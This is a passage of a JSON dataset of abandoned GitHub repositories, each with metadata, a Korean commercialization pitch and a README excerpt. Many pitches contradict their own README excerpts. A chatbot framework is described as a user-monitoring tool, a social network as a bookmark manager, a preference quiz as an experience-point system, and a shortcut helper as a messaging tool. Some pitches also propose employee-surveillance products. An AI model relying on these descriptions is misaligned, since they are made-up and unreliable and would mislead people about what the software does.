시간과 비용을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개인 재무 관리, 소규모 팀 협업 도구 같은 간단한 구독형 웹 서비스의 빠른 출시\n2. **내","readme_excerpt":"# Implementation of NeurIPS-2021 paper: Direct Multi-view Multi-person 3D Human Pose Estimation \n# [[paper](https://arxiv.org/pdf/2111.04076.pdf)] [[video-YouTube](https://www.youtube.com/watch?v=dBT4SO2ve0c), [video-Bilibili](https://www.bilibili.com/video/BV1sL4y1v7wy/)] [[slides](https://drive.google.com/file/d/1NJeAYTbbV3ohXaYcUM7up-qITp37pvf6/view)]\n\nThis is the official implementation of our NeurIPS-2021 work: Multi-view Pose Transformer (MvP). **MvP is a simple algorithm that directly regresses multi-person 3D human pose from multi-view images.**\n\n**:star::star::star:[News] A Re-implementation is integrated into **xrmocap**: at https://github.com/openxrlab/xrmocap**\n\n## Framework\n![mvp_framework](https://github.com/sail-sg/mvp/blob/main/figures/mvp_framework.png)\n## Example Result\n![mvp_framework](https://github.com/sail-sg/mvp/blob/main/figures/example_qualitative_result.png)\n\n## Reference\n```\n@article{wang2021mvp,\n  title={Direct Multi-view Multi-person 3D Human Pose Estimatio","composite_score":0.5016,"license_safety_tag":"safe"},{"name":"kean/NukeUI","github_url":"https://github.com/kean/NukeUI","stars":12,"language":"Swift","license":"MIT","abandonment_months":44,"description":"# NukeUI 상품화 분석\n\n## 왜 보물인가\niPhone 앱 개발자들이 사진과 이미지를 빠르게 처리할 수 있도록 만든 도구로, 복잡한 작업을 간단하게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n1. **사진 편집 앱 구독 서비스**: 필터, 효과, 리사이징 등을 클라우드에서 처리하는 웹 서비스로 제공\n2. **기업 이미지 처리 도구**: 마케팅팀이 대량의","readme_excerpt":"# NukeUI\n\n**Update**: Starting with [Nuke 11](https://github.com/kean/Nuke/releases/tag/11.0.0), NukeUI is now part of the main repo.\n","composite_score":0.5016,"license_safety_tag":"safe"},{"name":"saobingmodel/saobing","github_url":"https://github.com/saobingmodel/saobing","stars":12,"language":"JavaScript","license":"unknown","abandonment_months":55,"description":"# saobingmodel/saobing 분석 보고서\n\n## 왜 보물인가\n중국 소비자들의 선호도를 예측하는 AI 모델로, 전자상거래나 마케팅 회사들이 매출을 늘리는 데 직접 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **전자상거래 플랫폼 SaaS**: 온라인 쇼핑몰이 상품 추천 알고리즘으로 사용하여 고객 만족도 향상\n2. **마케팅 회사 내부 도","readme_excerpt":"# SaoBing\n\n<p align=\"center\">\n    <a href=\"https://github.com/saobingmodel/saobing\"><img src=\"https://img.shields.io/pypi/l/dailycheckin?style=popout-square\" alt=\"license\"></a>\n    <a href=\"https://github.com/saobingmodel/saobing\"><img src=\"https://img.shields.io/github/stars/saobingmodel/saobing.svg?style=popout-square\" alt=\"GitHub stars\"></a>\n    <a href=\"https://github.com/saobingmodel/saobing\"><img src=\"https://img.shields.io/github/forks/saobingmodel/saobing.svg?style=popout-square\" alt=\"GitHub forks\"></a>\n    <a href=\"https://hub.docker.com/r/saobing/saobing\"><img src=\"https://img.shields.io/docker/pulls/saobing/saobing?style=popout-square\" alt=\"Docker Pulls\"></a>\n    <a href=\"https://hub.docker.com/r/saobing/saobing/\"><img src=\"https://img.shields.io/docker/image-size/saobing/saobing?style=popout-square\" alt=\"Docker Size\"></a>\n    <a href=\"https://hub.docker.com/r/saobing/saobing/\"><img src=\"https://img.shields.io/docker/stars/saobing/saobing?style=popout-square\" alt=\"Docker Sta","composite_score":0.5016,"license_safety_tag":"unknown"},{"name":"NirantK/best-of-jupyter","github_url":"https://github.com/NirantK/best-of-jupyter","stars":5,"language":"","license":"MIT","abandonment_months":90,"description":"# best-of-jupyter 상품화 분석\n\n## 왜 보물인가\n데이터 분석과 인공지능 학습에 필수적인 Jupyter 도구들을 한곳에 모아놓은 '최고의 도구 모음집'으로, 초보자부터 전문가까지 필요한 것을 쉽게 찾을 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 학습 플랫폼 SaaS**\n온라인 강의 사이트가 데이터 분석 입문자들을 위해 \"추천 도구 학","readme_excerpt":"# Making the Best of Jupyter\n\nTips, Tricks, Best Practices with Sample Code for Productivity Boost\n---\nFound useful by Nobel Laureates and more:\n\n> # \"..., this looks very helpful\"\n>\n> - Economics Nobel Laureate 2018, Dr. Paul Romer [on Twitter](https://twitter.com/paulmromer/status/985518009879089152)\n\n### Contents\n* [Getting Started Right](#getting-started-right)\n* [Debugging](#debugging) - IPython debugger and `set_trace()`\n* [Programming Sugar](#programming-sugar) - using shell commands with Python from within notebook and other hacks\n    * [Search Magic](#search-magic) - search across several notebooks for a code snippet\n* [Jupyter Kungfu](#jupyter-kungfu) - jupyter specific tips such as looking up docs in several ways\n   * [Sanity Checks](#sanity-checks)\n   * :star: [nbdime](#nbdime) - Better `git diff` for Jupyter\n   * [Markdown Printing](#markdown-printing) - Use formatted Markdown in your print statements \n   * [Find currently running cell](#find-currently-running-cell) - java","composite_score":0.5016,"license_safety_tag":"safe"},{"name":"enkomio/ManagedInjector","github_url":"https://github.com/enkomio/ManagedInjector","stars":15,"language":"C#","license":"NOASSERTION","abandonment_months":61,"description":"# ManagedInjector 상용화 분석\n\n## 왜 보물인가\n프로그램 내부에 코드를 동적으로 주입하는 기술로, 보안 검사, 성능 모니터링, 프로그램 개조 등 다양한 산업에서 높은 가치를 지닙니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업 직원들의 컴퓨터 사용을 감시·관리하는 클라우드 기반 모니터링 솔루션\n2. **내부 업무 도구*","readme_excerpt":"# Managed Injector\nThis project implements a .NET Assembly injection library (it is inspired by the <a href=\"https://github.com/cplotts/snoopwpf\">snoopwpf</a> project). The remote process can be a managed or unmanaged one.\n\n## Download\n - [Source code][1]\n - [Download binary][2]\n\n## Usage\nWhen you want to inject an assembly in a remote process you have to consider the following aspects:\n\n* The ManagedInjector project currently supports only 32 bit process\n* The remote process must be a windows application (it must process messages in a message loop)\n\nIf the above pre-conditions are satisfied you can inject an assembly and invoke an activation method. There are three possibilities to invoke the activation method:\n\n* You must specify the full method name to invoke (eg. _this.is.my.namespace.class.method_)\n* You can inject an executable that defines an _EntryPoint_ method to execute (like a _Console_ project)\n* You can define a method with the following signatue: _<public|private> static ","composite_score":0.5016,"license_safety_tag":"unknown"},{"name":"arundo/tsaug","github_url":"https://github.com/arundo/tsaug","stars":5,"language":"Python","license":"Apache-2.0","abandonment_months":41,"description":"# arundo/tsaug 보물 분석\n\n## 왜 보물인가\n시계열 데이터(시간에 따라 변하는 수치들)를 자동으로 늘리고 변형해서 인공지능 학습을 더 쉽게 만들어주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **주식/암호화폐 예측 SaaS**: 과거 가격 데이터를 늘려서 더 정확한 가격 예측 모델 판매\n2. **IoT 센서 이상 탐지 API**: 공장 기계","readme_excerpt":"# tsaug\n\n[![Build Status](https://travis-ci.com/arundo/tsaug.svg?branch=master)](https://travis-ci.com/arundo/tsaug)\n[![Documentation Status](https://readthedocs.org/projects/tsaug/badge/?version=stable)](https://tsaug.readthedocs.io/en/stable/?badge=stable)\n[![Coverage Status](https://coveralls.io/repos/github/arundo/tsaug/badge.svg?branch=master&service=github)](https://coveralls.io/github/arundo/tsaug?branch=master)\n[![PyPI](https://img.shields.io/pypi/v/tsaug)](https://pypi.org/project/tsaug/)\n[![Downloads](https://pepy.tech/badge/tsaug)](https://pepy.tech/project/tsaug)\n[![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black)\n\n`tsaug` is a Python package for time series augmentation. It offers a set of\naugmentation methods for time series, as well as a simple API to connect\nmultiple augmenters into a pipeline.\n\nSee https://tsaug.readthedocs.io complete documentation.\n\n## Installation\n\nPrerequisites: Python 3.5 or later.\n\nIt i","composite_score":0.5016,"license_safety_tag":"safe"},{"name":"streamjoin/nusthesis","github_url":"https://github.com/streamjoin/nusthesis","stars":7,"language":"TeX","license":"MIT","abandonment_months":47,"description":"# streamjoin/nusthesis 분석\n\n## 왜 보물인가\n대학 논문 작성에 필요한 형식을 자동으로 맞춰주는 도구로, 학생들이 논문 양식 문제로 고생하는 시간을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 대학생을 위한 논문 작성 플랫폼(MS Word나 Google Docs 플러그인)으로 월간 구독 판매\n2. *","readme_excerpt":"# A LaTeX Template for PhD/Master Thesis of the National University of Singapore (NUS)\n\n> Although I have already left NUS, I'm still actively maintaining this thesis template. As the formatting guidelines may change from time to time, I endeavor to adapt this template to the latest guidelines, which (unfortunately) can only be accessed by NUS students and staff. Therefore, if you find that this template deviates from the latest guidelines, please [create an issue](https://github.com/streamjoin/nusthesis/issues) by attaching the guidelines and I will take the time to address it. Thanks for your support along the way! \n\nThis set of latex code (mainly the [`nusthesis.cls`](nusthesis.cls)) composes a template of NUS thesis, which is compliant with the [university's requirement](https://www.dropbox.com/s/o6jtrk9y7cil70w/General-Guidelines-and-Instructions-on-Format-of-Research-Thesis-and-Electronic-Submission.pdf \"General Guidelines and Instructions on Format of Research Thesis and Electro","composite_score":0.5016,"license_safety_tag":"safe"},{"name":"pietrobassi/bunnybook","github_url":"https://github.com/pietrobassi/bunnybook","stars":8,"language":"Python","license":"MIT","abandonment_months":50,"description":"# Bunnybook 저장소 분석\n\n## 왜 보물인가\n토끼 모양의 귀여운 캐릭터를 활용한 사용자 친화적인 북마크·컬렉션 관리 도구로, 복잡한 온라인 자료 정리를 누구나 쉽게 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기사, 이미지, 동영상 등 웹 자료를 카테고리별로 정리하는 구독형 저장 서비스\n2. **내부 업무 도구**: ","readme_excerpt":"# :rabbit: Bunnybook :rabbit:\n\n## A tiny social network (for bunnies), built with FastAPI and React+RxJs.\n\n<kbd>\n  <img src=\"https://user-images.githubusercontent.com/19171248/131324206-1f97c51b-7192-4e62-8619-abde46aea5b6.png\"/>\n</kbd>\n\n<div>&nbsp;</div>\n\nIncluded features:\n- :speech_balloon: chat\n- :red_circle: online/offline friends status\n- :abcd: \"Is typing...\" indicator\n- :two_men_holding_hands: friend requests and suggestions\n- :bell: notifications\n- :postbox: posts\n- :pencil: comments\n- :scroll: conversations history\n- :rabbit2: random profile picture generation\n- :lock: authentication\n\nTech stack:\n- :snake: Python 3.8 + FastAPI\n- :notebook_with_decorative_cover: PostgreSQL 13 + async SQLAlchemy (Core) + asyncpg driver\n- :link: Neo4j graph db for relationships between users and fast queries\n- :dart: Redis for caching and Pub/Sub\n- :zap: Socket.IO for chat and notifications\n- :key: Jwt + refresh tokens rotation for authentication\n- :whale: Docker + docker-compose to ease deploym","composite_score":0.5016,"license_safety_tag":"safe"},{"name":"tanersener/ffmpeg-kit","github_url":"https://github.com/tanersener/ffmpeg-kit","stars":6,"language":"C","license":"GPL-3.0","abandonment_months":45,"description":"# ffmpeg-kit 상품화 분석\n\n## 왜 보물인가\n동영상과 음성 파일을 빠르게 변환하고 처리하는 기술로, 유튜브 업로더부터 방송국까지 누구나 필요한 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **동영상 편집 SaaS**: 클라우드에서 사용자가 업로드한 영상을 자동으로 압축·포맷 변환해주는 웹 서비스\n2. **팟캐스트 제작 플랫폼**: 팟캐스터","readme_excerpt":"# FFmpegKit\n\nThis fork is not maintained.\n\nSee the parent [ffmpeg-kit](https://github.com/arthenica/ffmpeg-kit) repository for updates.\n","composite_score":0.5016,"license_safety_tag":"restricted"},{"name":"AnkurDeria/HSI-Traditional-to-Deep-Models","github_url":"https://github.com/AnkurDeria/HSI-Traditional-to-Deep-Models","stars":12,"language":"Jupyter Notebook","license":"unknown","abandonment_months":44,"description":"# HSI-Traditional-to-Deep-Models 분석\n\n## 왜 보물인가\n위성이나 드론으로 찍은 사진에서 지표면의 미세한 특징을 자동으로 분석하는 기술로, 환경 모니터링부터 농작물 관리까지 광범위하게 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **농업 관리 SaaS**: 농민이 스마트폰으로 촬영한 논밭 사진을 업로드하면 작물 상태와 병충","readme_excerpt":"# Hyperspectral Image Classification -- Traditional to Deep Models: A Survey for Future Prospects\n\nMuhammad Ahmad, Sidrah Shabbir, [Swalpa Kumar Roy](https://swalpa.github.io), [Danfeng Hong](https://sites.google.com/view/danfeng-hong), Xin Wu, Jing Yao, Adil Mehmood Khan, Manuel Mazzara, Salvatore Distefano, and [Jocelyn Chanussot](http://jocelyn-chanussot.net/)\n\n## Sample Disjoint Dataset\n\nGet the disjoint dataset (Trento11x11 folder) from [Google Drive](https://drive.google.com/drive/folders/1HK3eL3loI4Wd-RFr1psLLmVLTVDLctGd?usp=sharing).\n___________\n\nThe repository contains the implementations for [Hyperspectral Image Classification -- Traditional to Deep Models: A Survey for Future Prospects](https://ieeexplore.ieee.org/document/9645266).\n\n<img src=\"HSI_App.png\"/>\n\n---------------------\n\n## Models\n\nCurrently, the following traditional machine learning methods are available:\n\n- [x] [RF](https://ieeexplore.ieee.org/document/1396322)  \n- [x] [MLR](https://ieeexplore.ieee.org/document","composite_score":0.5016,"license_safety_tag":"unknown"},{"name":"aws-samples/reinvent-2017-deeplens-workshop","github_url":"https://github.com/aws-samples/reinvent-2017-deeplens-workshop","stars":5,"language":"Jupyter Notebook","license":"MIT-0","abandonment_months":103,"description":"# aws-samples/reinvent-2017-deeplens-workshop 분석\n\n## 왜 보물인가\nAWS의 공식 샘플로 만든 카메라가 달린 AI 기기를 학습하는 무료 튜토리얼이라, 기업들이 실제 AI 카메라 도입 시 참고할 수 있는 검증된 사례입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 스마트 보안 카메라 모니터링**\n- 소매점","readme_excerpt":"## Reinvent 2017 Deeplens Workshop\n\nA reference Lambda function that predicts image labels for a image using a MXNet built deep learning model\n\n## License Summary\n\nThis sample code is made available under a modified MIT license. See the LICENSE file.\n","composite_score":0.5016,"license_safety_tag":"safe"},{"name":"StarInitial/xpcheck","github_url":"https://github.com/StarInitial/xpcheck","stars":22,"language":"Ink","license":"MIT","abandonment_months":35,"description":"# xpcheck 저장소 분석\n\n## 왜 보물인가\n게임이나 앱에서 사용자의 경험치(레벨) 관리를 자동으로 해주는 기술로, 성장 시스템이 필요한 모든 서비스에 즉시 적용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **학습 앱 구독 서비스**: 사용자가 학습을 진행할 때마다 자동으로 경험치를 쌓고 레벨업 알림을 받는 교육 플랫폼\n2. **피트니스 트래킹 ","readme_excerpt":"# 深渊凝视着你 - XP接受程度测试\n\n![Anurag's GitHub stats](https://github-readme-stats.vercel.app/api?username=StarInitial&show_icons=true)\n\n[测试地址](https://starinitial.github.io/xpcheck/xpcheck/)\n","composite_score":0.5016,"license_safety_tag":"safe"},{"name":"manfredsteyer/yarp-auth-proxy","github_url":"https://github.com/manfredsteyer/yarp-auth-proxy","stars":5,"language":"C#","license":"unknown","abandonment_months":33,"description":"# YARP Auth Proxy 상업화 분석\n\n## 왜 보물인가\n웹 서비스에 접근하는 사용자를 자동으로 검증하고 관리해주는 보안 중개소 역할을 하는 오픈소스 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 여러 고객사의 내부 시스템을 안전하게 연결하되, 각사의 사용자 인증만 다르게 처리해야 하는 통합 플랫폼\n2. **내부 업무 도구**","readme_excerpt":"# Proof of Concept for an Auth Gateway for SPA\n\n_... aka Auth Reverse Proxy ... aka Backend for Frontend (BFF) ... aka Forward Authentication Service_ ...\n\n![All requests are tunneled through the Auth Gateway](./gateway.png)\n\n> This gateway shifts the use of security standards such as OAuth2 and OpenId Connect to the server side. This drastically simplifies the implementation of the SPA and makes your solution more secure.\n\n## 🔥 Features\n\n- ☑️ Easily implementing Authentication, Authorization, and SSO for SPAs (e. g. Angular) by making this gateway taking care of the heavy lifting on the serve side\n  \n- ☑️ Tokens (id_token, access_token, refresh_token) are only stored on server-side in order to increase security\n\n- ☑️ Uses OAuth 2 and OpenId Connect (OIDC)\n\n- ☑️ Successfully tested with Keycloak, Azure Active Directory, Auth0, and Identity Server\n\n- ☑️ Supports **Token Exchange** ([RFC 8693](https://datatracker.ietf.org/doc/html/rfc8693)) and as an alternative Azure AD's [OBO-Flow](htt","composite_score":0.5016,"license_safety_tag":"unknown"},{"name":"shentao/vue-global-events","github_url":"https://github.com/shentao/vue-global-events","stars":16,"language":"TypeScript","license":"MIT","abandonment_months":29,"description":"# vue-global-events 보물 분석\n\n## 왜 보물인가\n웹사이트나 앱에서 여러 페이지/화면 간에 정보를 빠르게 주고받을 수 있도록 해주는 작은 유틸리티로, Vue 개발자들이 매우 자주 필요로 하는 기능입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 협업 도구나 프로젝트 관리 앱에서 여러 창 간의 실시간 알림 시스템 구현\n2. *","readme_excerpt":"# vue-global-events [![Build Status](https://img.shields.io/circleci/project/shentao/vue-global-events/master.svg)](https://circleci.com/gh/shentao/vue-global-events) [![npm package](https://img.shields.io/npm/v/vue-global-events.svg)](https://www.npmjs.com/package/vue-global-events)\n\n> Add shortcuts by listening to events on the document, anywhere\n\nThis is the version for Vue 3, if you are looking for the Vue 2 version, [take a look at the `v1` branch](https://github.com/shentao/vue-global-events/tree/v1)\n\n## Sponsors\n\n### Bronze\n\n<p align=\"center\">\n  <a href=\"https://www.vuemastery.com/\" target=\"_blank\">\n    <img src=\"https://cdn.discordapp.com/attachments/258614093362102272/557267759130607630/Vue-Mastery-Big.png\" alt=\"Vue Mastery logo\" width=\"180px\">\n  </a>\n  <a href=\"https://vuejobs.com/\" target=\"_blank\">\n    <img src=\"https://cdn.discordapp.com/attachments/560524372897562636/636900598700179456/vuejobs-logo.png\" alt=\"Vue Jobs logo\" width=\"140px\">\n  </a>\n</p>\n\n## Installation\n\n```ba","composite_score":0.5016,"license_safety_tag":"safe"},{"name":"nasbench/MindMaps","github_url":"https://github.com/nasbench/MindMaps","stars":6,"language":"","license":"unknown","abandonment_months":55,"description":"# MindMaps 저장소 분석\n\n## 왜 보물인가\n복잡한 정보를 시각적인 마인드맵으로 자동 정렬해주는 도구로, 학습·기획·문제 해결 과정을 훨씬 효율적으로 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **교육 플랫폼 SaaS**: 학생들이 수업 내용을 마인드맵으로 자동 정리하고 공유하는 온라인 학습 서비스\n2. **회사 내부 도구**: 팀 미팅 내","readme_excerpt":"# MindMaps\n\nThis repository contains a collection of MindMaps that i've created\n\n## Windows System Processes\n\n- [Svchost (Service Host Process)](./Windows%20System%20Processes/Svchost/)\n- [Windows Services](./Windows%20System%20Processes/Services/)\n- [Windows System Processes](./Windows%20System%20Processes/)\n\n## Understanding & Detecting C2 Frameworks\n\n- [HARS - HTTPS Asynchronous Reverse Shell (Server Handler)](./Understanding%20%26%20Detecting%20C2%20Frameworks/HARS%20-%20HTTPS%20Asynchronous%20Reverse%20Shell/)\n- [TrevorC2 (Main Callback Flow)](./Understanding%20%26%20Detecting%20C2%20Frameworks/TrevorC2)\n\n## Finding Detection and Forensic Goodness In ETW Providers\n\n- [Finding Detection and Forensic Goodness In ETW Providers](./Finding%20Detection%20and%20Forensic%20Goodness%20In%20ETW%20Providers/)\n\n## ETW Providers\n\n- TBD\n\n## Visualize\n\nCurrently the Mind Maps are only available in **\".xmind\"** format. You can visualize them using [XMind](https://www.xmind.net/) or by importing t","composite_score":0.5016,"license_safety_tag":"unknown"},{"name":"lb2281075105/LBRNMeiTuan","github_url":"https://github.com/lb2281075105/LBRNMeiTuan","stars":21,"language":"JavaScript","license":"Apache-2.0","abandonment_months":73,"description":"# LBRNMeiTuan 저장소 분석\n\n## 왜 보물인가\n배달 앱처럼 복잡한 주문-배송 시스템을 자동으로 관리할 수 있는 기술이라 온라인 장사하는 모든 사람들이 필요로 합니다.\n\n## 어디에 쓸 수 있나\n1. **배달음식점 관리 SaaS**: 소규모 음식점들이 주문부터 배송까지 한 곳에서 관리하는 웹서비스로 월 구독료 수집\n2. **편의점·마트 배송 API","readme_excerpt":"# LBRNMeiTuan\nReactNative 仿美团项目\n\n1. 仿美团项目：首先设置标签栏和导航栏\n\n<img src=\"导航栏和标签栏.png\" width=\"375\">\n\n核心代码：\n```JavaScript\n\n        var LBRNMain = React.createClass({\n\n            getInitialState(){\n              return {\n                 selectedTab:'Home'\n               }\n            },\n        render() {\n              return (\n                <TabNavigator>\n\n                    {this.childNavigetor('首页','Home','icon_tabbar_homepage','icon_tabbar_homepage_selected','Home',LBRNHome)}\n                    {this.childNavigetor('商家','EB','icon_tabbar_merchant_normal','icon_tabbar_merchant_selected','EB',LBRNEB)}\n                    {this.childNavigetor('我的','Mine','icon_tabbar_mine','icon_tabbar_mine_selected','Mine',LBRNMine)}\n                    {this.childNavigetor('更多','More','icon_tabbar_misc','icon_tabbar_misc_selected','More',LBRNMore)}\n               </TabNavigator>\n        );\n        },\n\n        childNavigetor(title,tabName,normalImage, selectedImage,componentName,component){\n             r","composite_score":0.5015,"license_safety_tag":"safe"},{"name":"fossasia/query-server-artwork","github_url":"https://github.com/fossasia/query-server-artwork","stars":12,"language":"C++","license":"Apache-2.0","abandonment_months":63,"description":"# Query Server Artwork 상품화 분석\n\n## 왜 보물인가\n미술 작품 정보를 빠르게 검색하고 관리할 수 있는 시스템으로, 미술관이나 갤러리의 작품 데이터베이스 운영 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 중소 미술관·갤러리를 위한 \"작품 정보 관리 클라우드 서비스\" - 별도 설치 없이 웹에서","readme_excerpt":"# Neurolab Firmware\n\nRepository for firmware of Neurolab Open Hardware Platform.\n\n[![Build Status](https://travis-ci.org/fossasia/neurolab-firmware.svg?branch=master)](https://travis-ci.org/fossasia/neurolab-firmware)\n[![Gitter](https://badges.gitter.im/fossasia/neurolab.svg)](https://gitter.im/fossasia/neurolab?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)\n[![Mailing List](https://img.shields.io/badge/Mailing%20List-FOSSASIA-blue.svg)](https://groups.google.com/forum/#!forum/pslab-fossasia)\n[![Twitter Follow](https://img.shields.io/twitter/follow/pslabio.svg?style=social&label=Follow&maxAge=2592000?style=flat-square)](https://twitter.com/pslabio)\n\nWe are developing a neuro-device as a headband with integrated electronics. This repository holds the firmware for the Neurolab Hardware. The initial version of the firmware is based on the original AD7173-Arduino library of the Brain-Duino project.\n\n## Buy\n\n* You can get the device in future from the [FOSSASIA Shop](https://fossa","composite_score":0.5015,"license_safety_tag":"safe"},{"name":"drorlab/atom3d","github_url":"https://github.com/drorlab/atom3d","stars":5,"language":"Python","license":"MIT","abandonment_months":39,"description":"# ATOM3D 저장소 분석\n\n## 왜 보물인가\n단백질과 분자 구조를 학습하는 AI 모델을 만들 때 필요한 대규모 데이터셋을 제공하는 오픈소스로, 신약 개발과 재료과학 분야의 AI 혁신을 가속화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **신약 개발 SaaS**: 제약회사를 위해 신약 후보 물질을 빠르게 분석하고 예측하는 구독형 웹 서비스\n2. *","readme_excerpt":"# ATOM3D: Tasks On Molecules in 3 Dimensions\n\n[![Documentation\nStatus](https://readthedocs.org/projects/atom3d/badge/?version=latest)](http://atom3d.readthedocs.io/?badge=latest)\n![Package](https://github.com/drorlab/atom3d/workflows/package/badge.svg)\n[![codecov](https://codecov.io/gh/drorlab/atom3d/branch/master/graph/badge.svg?token=DHH78W45AB)](https://codecov.io/gh/drorlab/atom3d)\n[![PyPI version](https://badge.fury.io/py/atom3d.svg)](https://badge.fury.io/py/atom3d)\n\n[ATOM3D](https://www.atom3d.ai/) enables machine learning on three-dimensional molecular structure.\n\n## Features\n\n* Access to several datasets involving 3D molecular structure. \n* LMDB data format for storing lots of molecules (and associated metadata).\n* Utilities for splitting/filtering data based on many criteria.\n\nFor more detailed information, [read the documentation](https://atom3d.readthedocs.io/en/latest/).\n\n## Installation\n\nInstall with:\n\n```\npip install atom3d\n```\n    \nTo use rdkit functionality, please ins","composite_score":0.5015,"license_safety_tag":"safe"},{"name":"DengpanFu/LUPerson","github_url":"https://github.com/DengpanFu/LUPerson","stars":7,"language":"Python","license":"unknown","abandonment_months":38,"description":"# LUPerson 저장소 분석\n\n## 왜 보물인가\n사람을 추적하고 인식하는 기술로, 보안 카메라나 사람 찾기 같은 실생활 문제를 자동으로 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **보안 감시 SaaS**: CCTV 영상을 자동으로 분석해 특정 인물 추적 기능을 제공하는 구독 서비스\n- **공항/역 내부 도구**: 혼잡한 장소에서 특정 승객이나","readme_excerpt":"# LUPerson\nUnsupervised Pre-training for Person Re-identification (LUPerson).\n\n[![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/unsupervised-pre-training-for-person-re/person-re-identification-on-msmt17)](https://paperswithcode.com/sota/person-re-identification-on-msmt17?p=unsupervised-pre-training-for-person-re)\n[![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/unsupervised-pre-training-for-person-re/person-re-identification-on-dukemtmc-reid)](https://paperswithcode.com/sota/person-re-identification-on-dukemtmc-reid?p=unsupervised-pre-training-for-person-re)\n[![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/unsupervised-pre-training-for-person-re/person-re-identification-on-market-1501)](https://paperswithcode.com/sota/person-re-identification-on-market-1501?p=unsupervised-pre-training-for-person-re)\n[![PWC](https://img.shields.io/endpoint.svg?url=https://paperswithcode.com/badge/unsupervised","composite_score":0.5015,"license_safety_tag":"unknown"},{"name":"Peekobot/peekobot","github_url":"https://github.com/Peekobot/peekobot","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":71,"description":"# Peekobot 상용화 분석\n\n## 왜 보물인가\n사용자 행동을 자동으로 감시하고 분석하는 기술로, 기업의 업무 효율성 모니터링이나 사용자 경험 개선에 즉시 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 직원 생산성 관리 플랫폼으로 출시하여 기업들에게 월 구독 형태로 판매\n- **내부 업무 도구**: 콜센터나 고객 서비스팀의","readme_excerpt":"# Peekobot\n\nPeekobot is a simple, choice-driven chatbot framework for your website written in ~~less\nthan~~ just over 100 lines of ES6 vanilla JavaScript (and some CSS).\n\nThere is an [example bot](https://peekobot.github.io/peekobot/) you can see in the [`/docs`](/docs) folder.\n\nThere is also a [CodePen](https://codepen.io/magicroundabout/pen/RwwXxoo) you can tinker with.\n\n## Features\n\n* Small, simple, zero dependencies (unless you need old browser compatibility)\n* Define your conversation as a simple JavaScript object\n* Choice/button driven conversations\n* Options to link to URLs as well as other parts of the conversation\n\n## Browser Compatibility\n\nI use async/await and CSS custom properties, so, broadly speaking, Internet Explorer \nand Opera Mini are not supported.\n\nYou can use Babel or similar to bring IE11 compatibility to the JavaScript.\n\nYou can also manually inline the CSS custom properties if you want to.\n\n## Usage\n\nPeekobot is not a package or library. You can't `npm install` ","composite_score":0.5015,"license_safety_tag":"safe"},{"name":"tuya/tuya-wifi-mcu-sdk-arduino-library","github_url":"https://github.com/tuya/tuya-wifi-mcu-sdk-arduino-library","stars":15,"language":"C++","license":"unknown","abandonment_months":37,"description":"# Tuya WiFi MCU SDK Arduino 라이브러리 분석\n\n## 왜 보물인가\n스마트홈 기기를 직접 만들거나 개선하려는 개발자들이 복잡한 통신 기술을 쉽게 적용할 수 있는 실용적인 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **스마트홈 기기 제조 SaaS**: 중소 전자제품 회사들에게 \"손쉽게 스마트 기능을 추가하는 서비스\" 제공\n2. **IoT","readme_excerpt":"# Tuya MCU SDK Arduino Library\n\n[English](./README.md) | [中文](./README_zh.md)\n\nTuya MCU SDK Arduino Library is developed based on the Tuya Wi-Fi general integration solution. The device's MCU is connected to a Wi-Fi module through a serial port to implement a network connection. **The development is based on general firmware, which supports the adaptative 9600 and115200 baud rate. Please read this document carefully before development.**\n\n<div align='center'>\n<img src=\"https://images.tuyacn.com/smart/shiliu_zone/Tuya_Arduino_library/mcu_wifi_connect.png\"/>\n</div>\n\n## [Tuya Beta Test Program](https://pages.tuya.com/develop/ArduinoBetaTest_discord?_source=f21d8ebfe2cde74110e27b26366a81f3)\nNow welcome to join the [Tuya Beta Test Program](https://pages.tuya.com/develop/ArduinoBetaTest_discord?_source=f21d8ebfe2cde74110e27b26366a81f3) to get your development gifts and make your own arduino projects with Tuya Support. Your feedback is helpful and valuable to the whole community.\n![image](htt","composite_score":0.5015,"license_safety_tag":"unknown"},{"name":"Morphl-AI/MorphL-Community-Edition","github_url":"https://github.com/Morphl-AI/MorphL-Community-Edition","stars":16,"language":"Python","license":"Apache-2.0","abandonment_months":81,"description":"","readme_excerpt":"<div align=\"center\">\n    <img src=\"https://raw.githubusercontent.com/Morphl-Project/media-kit/master/05%20-%20Banners/morphl-banner-color.png\" style=\"width:1200px; height: auto;\" />\n</div>\n\n# MorphL Community Edition\n\nMorphL Community Edition uses Big Data & Machine Learning to predict user behaviors in digital products and services with the goal of increasing KPIs (click-through rates, conversion rates, etc.) through personalization. MorphL AI is funded through [Google Digital News Initiative](https://newsinitiative.withgoogle.com/dnifund/) and [European Data Incubator](https://edincubator.eu/).\n\nThe process of building successful data-driven products undergoes many iterations. Data scientists, product manager, marketing or sales people and software developers need to come together to analyze the data and create a feature list for the next product release. This leads to lots of guess-work, not to mention the huge amount of time and resources required to reach a decent result, whether 